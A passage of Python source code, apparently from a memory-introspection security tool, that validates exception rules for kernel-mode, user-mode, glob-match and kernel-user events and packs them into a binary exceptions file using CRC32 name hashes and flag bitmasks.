# \sysroot\etc\a.exe, /home/user/a.out, \??\C:\Program Files\a.exe, etc.
return True
if str.isalpha(name[0]) and name[1] == ":" and name[2] == "\\":
# C:\Program Files, D:\Program Files, etc.
return True
return False
def get_name_from_path(path):
""" Given a path, returns the name of the file (the last part in the path).
The path must not end with a separator ('\\' on windows, '/' on linux).
Returns a string containing the name. """
if not is_path(path):
return path
last = path.rfind("\\")
if last == -1:
last = path.rfind("/")
if last == -1:
raise ValueError("Path %s is not containing any name!" % path)
if last == len(path) - 1:
raise ValueError("Path %s ends with separator!" % path)
return path[last + 1 :]
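# unsigned() truncates a value to its unsigned 32-bit representation; it is used to normalise CRC32
# hashes and flags before they are packed with struct.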
def unsigned(val):
return int(val & 0xFFFFFFFF)
def cmp_unsigned(val1, val2):
""" Compares 'val1' and 'val2' as unsigned numbers. Respects the
unix 'cmp' function return values (-1, 0, 1). """
val1 = unsigned(val1)
val2 = unsigned(val2)
if val1 > val2:
return 1
if val1 < val2:
return -1
return 0
def cmp_string(val1, val2):
""" Compares 'val1' and 'val2' as unsigned numbers. Respects the
unix 'cmp' function return values (-1, 0, 1). """
if val1 > val2:
return 1
if val1 < val2:
return -1
return 0
def get_binary_name(name, cls, wide=True, trim=0):
""" Returns the binary hash of the given name. This function also checks
the predefined names in the config file based on the `cls` argument.
If `wide` is True, then it will convert the name to the wide (utf-16)
format.
If trim is != 0, then it will trim the name to `trim` chars. """
if not name:
return int(-1)
if cls is KernelException:
predefined = excfg.get("Predefined", "kernel-mode")
elif cls is UserException:
predefined = excfg.get("Predefined", "user-mode")
elif cls is KernelUserException:
predefined = excfg.get("Predefined", "kenrel-user-mode")
elif cls is Signature:
predefined = excfg.get("Predefined", "signature")
else:
raise ValueError("Invalid class %s" % cls)
if name in predefined:
return predefined[name]
if trim:
return crc32.crc32(name[:trim], wide=wide)
return crc32.crc32(name, wide=wide)
def get_binary_flags(flags, cls):
""" Returns the binary representation of the given flags.
If the `cls` is a UserException then it will use the values from 'user-mode'
config flags and the 'common' ones.
If the `cls` is a KernelException then it will use the values from
'kernel-mode' config flags and the 'common' ones.
If the `cls` is a UserException then it will use the values from
'signatures' config flags. The 'common' ones are ignored. """
cfg_cflags = excfg.get("Flags", "common")
if cls is KernelException:
cfg_flags = excfg.get("Flags", "kernel-mode")
elif cls is UserException or cls is UserGlobException:
cfg_flags = excfg.get("Flags", "user-mode")
elif cls is KernelUserException:
cfg_flags = excfg.get("Flags", "user-mode")
cfg_flags.update(excfg.get("Flags", "kernel-mode"))
cfg_flags.update(excfg.get("Flags", "kernel-user-mode"))
elif cls is Signature:
cfg_flags = excfg.get("Flags", "signatures")
cfg_cflags = []
else:
raise ValueError("Invalid class %s" % cls)
bin_flags = 0
for flag in flags.split(" "):
if flag in cfg_flags:
bin_flags = bin_flags | cfg_flags[flag]
elif flag in cfg_cflags:
bin_flags = bin_flags | cfg_cflags[flag]
else:
raise ValueError("Invalid flag " + flag)
return bin_flags
def get_sig_id(sig_id, sig_type, create_new=True):
""" If we don't have this signature in the hash_map, then add it this way;
if we request the id of a signature at different times and from different
functions, we will get either a new one, or the old one. """
if sig_type == 0 and sig_id not in SIG_IDS:
raise ValueError("invalid signature type")
if sig_id not in SIG_IDS:
if not create_new:
raise ValueError("Signature %s not present!" % sig_id)
new_id = len(SIG_IDS) + 1
new_id += (sig_type << 22)
SIG_IDS[sig_id] = new_id
elif create_new:
raise ValueError("Duplicated signature found", sig_id)
return SIG_IDS[sig_id]
def get_binary_signatures(signatures):
""" Returns a sorted list containing the binary id of each signature. For
more details see `get_sig_id`. """
if not signatures:
return []
return sorted([get_sig_id(sig, 0, False) for sig in signatures])
class IntroObject(metaclass=ABCMeta):
""" Just an interface containing method for dumping objects in binary
or textual form. """
@abstractmethod
def get_binary_header(self):
""" Returns the binary header, dependent on the object type. """
raise NotImplementedError
@abstractmethod
def get_binary(self):
""" Returns the binary contents, dependent on the object type. """
raise NotImplementedError
def _cmp(self, other):
""" Will be replaced below, and each of '__lt__', etc. will call the
proper '_cmp' method. """
raise NotImplementedError
def __lt__(self, other):
return self._cmp(other) < 0
def __le__(self, other):
return self._cmp(other) <= 0
def __gt__(self, other):
return self._cmp(other) > 0
def __ge__(self, other):
        return self._cmp(other) >= 0
def __eq__(self, other):
return self._cmp(other) == 0
def __ne__(self, other):
return self._cmp(other) != 0
class IntroFileHeader(IntroObject):
""" Represent the header of the exceptions file. This is written only once,
    at the beginning. """
def __init__(self, km_count, um_count, kum_count, umgb_count, sig_count, build):
self.km_count = km_count
self.um_count = um_count
self.kum_count = kum_count
self.umgb_count = umgb_count
self.sig_count = sig_count
self.build = build
def get_binary(self):
""" Returns a binary string containing the values from the tuple.
The format is as follows:
- HeaderMagic[32]
- VersionMajor[16]
- VersionMinor[16]
- KernelExceptionsCount[32]
- UserExceptionsCount[32]
- SignaturesCount[32]
- BuildNumber[32]
- UserGlobExceptionCount[32]
        - KernelUserExceptionsCount[32]
        - Reserved1[32] """
return struct.pack(
"<IHHIIIIIII",
DEFAULT_FLAGS["HeaderMagic"],
excfg.get("Version", "Major"),
excfg.get("Version", "Minor"),
self.km_count,
self.um_count,
self.sig_count,
self.build,
self.umgb_count,
self.kum_count,
0,
)
def _cmp(self, other):
""" Not implemented in this class. """
return NotImplemented
def get_binary_header(self):
""" Not implemented in this class. """
return NotImplemented
class KernelException(IntroObject):
""" Represents a kernel-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator and self.object_type not in ("token-privs", "security-descriptor", "acl-edit", "sud-modification"):
raise ValueError("originator cannot be missing!")
if not self.object_type:
raise ValueError("object type cannot be missing!")
if not self.victim and self.object_type in (
"driver",
"driver imports",
"driver code",
"driver data",
"driver resources",
"drvobj",
"fastio",
"driver exports",
"token-privs",
"security-descriptor",
"acl-edit",
"sud-modification"
):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type in ("msr", "ssdt", "cr4", "idt", "idt-reg", "gdt-reg", "infinity-hook", "hal-perf-counter", "interrupt-obj"):
raise ValueError("Type %s must miss victim name!" % self.object_type)
if self.flags is None:
# if no flags are given, then use the default ones
self.flags = DEFAULT_FLAGS["KernelExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if self.object_type == "cr4":
if ("smep" not in flagsl) and ("smap" not in flagsl):
raise ValueError("Type cr4 must flags must contain smap/smep!")
if not any(word in flagsl for word in ("read", "write", "exec")):
self.flags += " write"
if ("non-driver" in flagsl) and ("return-drv" not in flagsl):
# non-driver implies return-drv
self.flags += " return-drv"
if "return-drv" in flagsl:
raise ValueError('"return-drv" is now obsolete. Please use "return"!')
# We moved return to the common area, so add return-drv if needed (for now)
if "return" in flagsl:
self.flags += " return-drv"
if "integrity" in flagsl and self.object_type in ("token-privs", "sud-modification"):
if self.originator:
raise ValueError("Type %s with integrity flag must not have originator!" % self.object_type)
self.originator = "-"
self.originator_name = "-"
elif self.object_type in ("token-privs",) and not self.originator:
raise ValueError("Originator cannot be missing for %s without integrity flag!" % self.object_type)
if self.object_type in ("security-descriptor", "acl-edit"):
if "integrity" in flagsl:
if self.originator:
raise ValueError("Type %s with integrity flag must not have originator!" % self.object_type)
self.originator = "-"
self.originator_name = "-"
else:
raise ValueError("%s only works with integrity flag for now!" % self.object_type)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
else:
self.originator = self.originator.lower()
self.originator_name = self.originator_name.lower()
# for sud fields we need case sensitive hashes
if self.object_type in ("sud-modification",):
self.victim = self.victim if self.victim else "*"
else:
self.victim = self.victim.lower() if self.victim else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields.
        'originator' field will be separated into path + name. If only a name
is given then path will be equal with the name. """
self.binary["object"] = excfg.get("Types", "kernel-mode")[self.object_type]
        bin_name = get_binary_name(self.originator_name, KernelException)
self.binary["name"] = bin_name
self.binary["path"] = -1
if self.object_type in ("sud-modification"):
self.binary["victim"] = get_binary_name(self.victim, KernelException, wide=False)
elif self.object_type in ("token-privs", "security-descriptor", "acl-edit"):
self.binary["victim"] = get_binary_name(self.victim, KernelException, wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["victim"] = get_binary_name(self.victim, KernelException)
self.binary["flags"] = get_binary_flags(self.flags, KernelException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(self, originator=None, object_type=None, victim=None, flags=None, signatures=None, **kwargs):
self.originator = originator
self.originator_name = get_name_from_path(self.originator)
self.object_type = object_type
self.victim = victim
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two KernelExceptions. The fields are compared in order:
- originator path, originator name, object, victim, flags
- signatures is ignored! """
value = cmp_unsigned(self.binary["path"], other.binary["path"])
if value:
return value
value = cmp_unsigned(self.binary["name"], other.binary["name"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["path"],
self.originator_name,
self.binary["name"],
self.victim,
self.binary["victim"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
        The format is as follows:
- type[8] = 1
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 1, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
kernel-mode exception.
        The format is as follows:
- name[32]
- path[32]
- victim[32],
- flags[32]
- reserved[8]
- type[8]
- sig_count[16]
- sigs-array[32 * sig_count]
name, path - a CRC32 will be applied to them
victim - same as name and path
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", int(sig & 0xFFFFFFFF))
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["name"]),
unsigned(self.binary["path"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserException(IntroObject):
""" Represents a user-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.victim != "*" and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ['read', 'write', 'exec']):
if self.object_type == 'nx_zone' or self.object_type == 'process-creation' or self.object_type == 'process-creation-dpi':
self.flags += ' exec'
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process else None
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else None
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if self.object_type in (
'process', 'thread-context', 'peb32', 'peb64', 'apc-thread', 'process-creation', 'process-creation-dpi', 'instrumentation-callback') and 'module-load' not in self.flags:
if "linux" in self.flags:
self.binary['originator'] = get_binary_name(self.originator, UserException,
wide=False, trim=LIX_COMM_LEN)
else:
self.binary['originator'] = get_binary_name(self.originator, UserException,
wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["originator"] = get_binary_name(self.originator, UserException)
if self.object_type in ('process', 'thread-context', 'peb32', 'peb64', 'apc-thread', 'process-creation', 'double-agent', 'process-creation-dpi', 'instrumentation-callback'):
if "linux" in self.flags:
self.binary['victim'] = get_binary_name(self.victim, UserException,
wide=False, trim=LIX_COMM_LEN)
else:
self.binary['victim'] = get_binary_name(self.victim, UserException,
wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["victim"] = get_binary_name(self.victim, UserException)
if self.process:
self.binary["process"] = get_binary_name(
self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["process"] = 0
self.binary["flags"] = get_binary_flags(self.flags, UserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def _fix_name(self, name):
if not name:
return name
if name[0] == "*" and "\\x" in name:
new_name = b""
i = 0
while i < len(name):
# Let it crash in case i + 4 > len(name)... it's invalid after all
if name[i] == "\\" and name[i + 1] == "x":
new_name += bytes([int(name[i + 2 : i + 4], 16)])
i += 4
continue
else:
new_name += name[i].encode()
i += 1
return new_name
return name
def _fix_json_names(self):
self.originator = self._fix_name(self.originator)
self.victim = self._fix_name(self.victim)
self.process = self._fix_name(self.process)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._fix_json_names()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserExceptions by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
        The format is as follows:
- type[8] = 2
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 2, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception.
        The format is as follows:
- originator[32]
- victim[32]
- process[32],
- flags[32]
- reserved[8]
- type[8]
        - sig_count[16]
- sigs-array[32 * sig_count]
process - truncated to 15 chars (including NULL terminator)
victim - if object_type is 'process' then it will be truncated same as 'process'
originator, - same as victim
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserApcException(IntroObject):
""" Represents a user-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ["read", "write", "exec"]):
if self.object_type == "nx_zone":
self.flags += " exec"
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process else None
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else None
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if (
self.object_type in ("process", "thread-context", "peb32", "peb64", "apc-thread", "double-agent", "instrumentation-callback")
and "module-load" not in self.flags
):
self.binary["originator"] = get_binary_name(
self.originator, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["originator"] = get_binary_name(self.originator, UserException)
if self.object_type in ("process", "thread-context", "peb32", "peb64", "apc-thread", "double-agent", "instrumentation-callback"):
self.binary["victim"] = get_binary_name(
self.victim, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["victim"] = get_binary_name(self.victim, UserException)
if self.process:
self.binary["process"] = get_binary_name(
self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["process"] = 0
self.binary["flags"] = get_binary_flags(self.flags, UserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserExceptions by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
        The format is as follows:
- type[8] = 9
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 9, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception.
        The format is as follows:
- originator[32]
- victim[32]
- process[32],
- flags[32]
- reserved[8]
- type[8]
        - sig_count[16]
- sigs-array[32 * sig_count]
process - truncated to 15 chars (including NULL terminator)
victim - if object_type is 'process' then it will be truncated same as 'process'
originator, - same as victim
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserGlobException(IntroObject):
""" Represents a user-mode exception (glob match). For more details about it's
implementation see `get_binary`. """
def _validate_glob(self, pattern):
pattern_chars = re.sub(r"\[[^]]+\]|\?", "", pattern)
items = re.findall(r"\[[^]]+\]|\?", pattern)
if len(pattern_chars) + len(items) > IMAGE_BASE_NAME_LEN:
raise ValueError("Pattern too long: %s" % pattern)
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
glob_items = ["*", "[", "]", "?", "\\\\"]
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
self.process = self.process if self.process else ""
if not any(item in self.originator + self.victim + self.process for item in glob_items):
raise ValueError(
"At least one field (process, originator, victim) must contain glob items(*, ?, [, ] )."
)
if self.process:
self._validate_glob(self.process)
if self.victim:
self._validate_glob(self.victim)
if self.originator:
self._validate_glob(self.originator)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ["read", "write", "exec"]):
if self.object_type == "nx_zone" or self.object_type == 'process-creation' or self.object_type == 'process-creation-dpi':
self.flags += " exec"
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process != "" else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if self.object_type in ("process", "thread-context") and "module-load" not in self.flags:
self.binary["originator"] = self.originator
else:
self.binary["originator"] = self.originator
if self.object_type in ("process", "thread-context"):
self.binary["victim"] = self.victim
else:
self.binary["victim"] = self.victim
if self.process:
self.binary["process"] = self.process
else:
self.binary["process"] = "*"
self.binary["flags"] = get_binary_flags(self.flags, UserGlobException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserGlobException by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_string(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_string(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_string(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_string(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%s), '%s' (%s), '%s' (%s), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode (glob match)
exception.
        The format is as follows:
        - type[8] = 6
        - size[16] = 8 + len(originator) + len(victim) + len(process) + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
len_victim = len(self.victim) + 1 if self.victim else 0
len_originator = len(self.originator) + 1 if self.originator else 0
len_process = len(self.process) + 1 if self.process else 0
size = 8 + len_originator + len_victim + len_process
return struct.pack("<BH", 6, size + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception (glob match).
        The format is as follows:
- flags[32]
- reserved[8]
- type[8]
        - sig_count[16]
- originator[32]
- victim[32]
- process[32],
- sigs-array[32 * sig_count]
process - regex
victim - regex
originator - regex
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IBBH%ds%ds%ds"
% (
len(self.binary["originator"]) + 1, # add NULL-terminator
len(self.binary["victim"]) + 1, # add NULL-terminator
len(self.binary["process"]) + 1,
), # add NULL-terminator
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
bytes(self.binary["originator"], "utf-8"),
bytes(self.binary["victim"], "utf-8"),
bytes(self.binary["process"], "utf-8"),
)
+ packed_sigs
)
class KernelUserException(IntroObject):
""" Represents a kernel-user exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim:
raise ValueError("Victim cannot be missing!" % self.object_type)
if self.flags is None:
# if no flags are given, then use the default ones
self.flags = DEFAULT_FLAGS["KernelExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ("read", "write", "exec")):
self.flags += " write"
if ("non-driver" in flagsl) and ("return-drv" not in flagsl):
# non-driver implies return-drv
self.flags += " return-drv"
if "return" in flagsl:
self.flags += " return-drv"
if "user" in flagsl and "kernel" in flagsl:
raise ValueError("Both user and kernel injection flags were given!")
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.originator = self.originator if self.originator else "*"
self.process = self.process if self.process else "*"
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields.
        'originator' field will be separated into path + name. If only a name
is given then path will be equal with the name. """
self.binary["object"] = excfg.get("Types", "kernel-user-mode")[self.object_type]
if "user" in self.flags:
self.binary["originator"] = get_binary_name(self.originator, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["originator"] = get_binary_name(self.originator, KernelException)
self.binary["victim"] = get_binary_name(self.victim, UserException)
self.binary["flags"] = get_binary_flags(self.flags, KernelUserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
self.binary["process"] = get_binary_name(self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN)
def __init__(self, process=None, originator=None, object_type=None, victim=None, flags=None, signatures=None, **kwargs):
self.originator = originator
self.object_type = object_type
self.process = process
self.victim = victim
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two KernelExceptions. The fields are compared in order:
- originator path, originator name, object, victim, flags
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.process,
self.binary["process"],
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
The format it's as follows:
- type[8] = 1
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 14, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
        kernel-user exception.
        The format is as follows:
        - originator[32]
        - victim[32]
        - process[32]
        - flags[32]
        - reserved[8]
        - type[8]
        - sig_count[16]
        - sigs-array[32 * sig_count]
        originator, victim, process - a CRC32 will be applied to them
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
